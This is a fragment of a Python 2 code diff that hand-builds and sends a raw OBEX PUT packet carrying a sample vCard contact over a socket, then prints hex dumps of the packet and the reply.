+    body_header = "\x49\x00\xa0\x42\x45\x47\x49\x4e\x3a\x56\x43\x41\x52\x44\x0d\x0a\x56\x45\x52\x53\x49\x4f\x4e\x3a\x32\x2e\x31\x0d\x0a\x4e\x3b\x45\x4e\x43\x4f\x44\x49\x4e\x47\x3d\x38\x42\x49\x54\x3b\x43\x48\x41\x52\x53\x45\x54\x3d\x55\x54\x46\x2d\x38\x3a\x42\x6c\x6f\x67\x67\x73\x3b\x4a\x6f\x65\x0d\x0a\x54\x45\x4c\x3b\x50\x52\x45\x46\x3b\x43\x45\x4c\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x54\x45\x4c\x3b\x56\x4f\x49\x43\x45\x3a\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x0d\x0a\x45\x4d\x41\x49\x4c\x3a\x72\x6f\x6f\x74\x40\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f\x6d\x0d\x0a\x45\x4e\x44\x3a\x56\x43\x41\x52\x44\x0d\x0a"
+    put_pkg = "\x82\x00" + chr(len(name_header) + len(body_header) + 3) + name_header + body_header
+    print "Packet dump: ", binascii.b2a_hex(put_pkg)
+    sock.send(put_pkg)
+    print "Packet sent"
+
+    try:
+        resp = sock.recv(20)
+        print "Response dump: %s" %(binascii.b2a_hex(resp))
+    except:
+        print "Failed to receive response: ", sys.exc_info()[0]
+    
+    sock.close()